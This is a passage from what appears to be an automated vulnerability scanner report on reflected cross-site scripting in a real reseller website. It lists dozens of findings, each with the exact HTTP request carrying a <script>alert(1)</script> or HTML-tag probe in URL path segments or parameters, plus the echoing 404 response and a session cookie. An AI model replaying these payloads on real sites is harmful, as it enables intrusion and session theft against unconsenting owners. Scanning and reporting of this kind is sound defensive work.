...[SNIP]...

2.3227. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload cb0ef<script>alert(1)</script>7ae5ac18677 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/search.phpcb0ef<script>alert(1)</script>7ae5ac18677?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.phpcb0ef<script>alert(1)</script>7ae5ac18677?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3228. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload db9e2<a>70d1329c5b3 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchdb9e2<a>70d1329c5b3&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchdb9e2<a>70d1329c5b3&opt=2 was not found on this server.</p>
...[SNIP]...

2.3229. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 73bc4<a>de6bee5889c was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...73bc4<a>de6bee5889c&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.php?keyword=search...73bc4<a>de6bee5889c&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3230. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9fe3c<script>alert(1)</script>71a9cc9b5e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9fe3c<script>alert(1)</script>71a9cc9b5e5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&9fe3c<script>alert(1)</script>71a9cc9b5e5=1 was not found on this server.</p>
...[SNIP]...

2.3231. http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5780b<a>6f7552b5985 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25780b<a>6f7552b5985 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=25780b<a>6f7552b5985 was not found on this server.</p>
...[SNIP]...

2.3232. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dfed9<script>alert(1)</script>e9102e10691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildfed9<script>alert(1)</script>e9102e10691/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildfed9<script>alert(1)</script>e9102e10691/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3233. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15491<script>alert(1)</script>5c2e804eb86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4515491<script>alert(1)</script>5c2e804eb86/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4515491<script>alert(1)</script>5c2e804eb86/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3234. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 61f43<script>alert(1)</script>52e2d80c88a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes61f43<script>alert(1)</script>52e2d80c88a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes61f43<script>alert(1)</script>52e2d80c88a/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3235. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 99d42<script>alert(1)</script>69b57fe93cc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos99d42<script>alert(1)</script>69b57fe93cc/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos99d42<script>alert(1)</script>69b57fe93cc/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3236. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 91ff8<script>alert(1)</script>45d431b546 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images91ff8<script>alert(1)</script>45d431b546/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images91ff8<script>alert(1)</script>45d431b546/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3237. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8caf9<script>alert(1)</script>abdc9463f28 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/search.php8caf9<script>alert(1)</script>abdc9463f28?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php8caf9<script>alert(1)</script>abdc9463f28?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3238. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 27a1a<a>bb3276ec124 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search27a1a<a>bb3276ec124&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search27a1a<a>bb3276ec124&opt=2 was not found on this server.</p>
...[SNIP]...

2.3239. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c9aac<a>74838f2607f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...c9aac<a>74838f2607f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php?keyword=search...c9aac<a>74838f2607f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3240. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 645a2<script>alert(1)</script>95e64a94e99 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&645a2<script>alert(1)</script>95e64a94e99=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&645a2<script>alert(1)</script>95e64a94e99=1 was not found on this server.</p>
...[SNIP]...

2.3241. http://www.resellerbase.com/detail/45/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 69806<a>3d8c6181e26 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=269806<a>3d8c6181e26 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=269806<a>3d8c6181e26 was not found on this server.</p>
...[SNIP]...

2.3242. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9baa7<script>alert(1)</script>a1787707a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9baa7<script>alert(1)</script>a1787707a3/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9baa7<script>alert(1)</script>a1787707a3/45/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3243. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e634<script>alert(1)</script>a5d38bf50c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/459e634<script>alert(1)</script>a5d38bf50c9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/459e634<script>alert(1)</script>a5d38bf50c9/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3244. http://www.resellerbase.com/detail/45/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/45/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4de27<script>alert(1)</script>2ca2e0f965a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45/themes4de27<script>alert(1)</script>2ca2e0f965a/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:23 GMT
Server: Apache/2
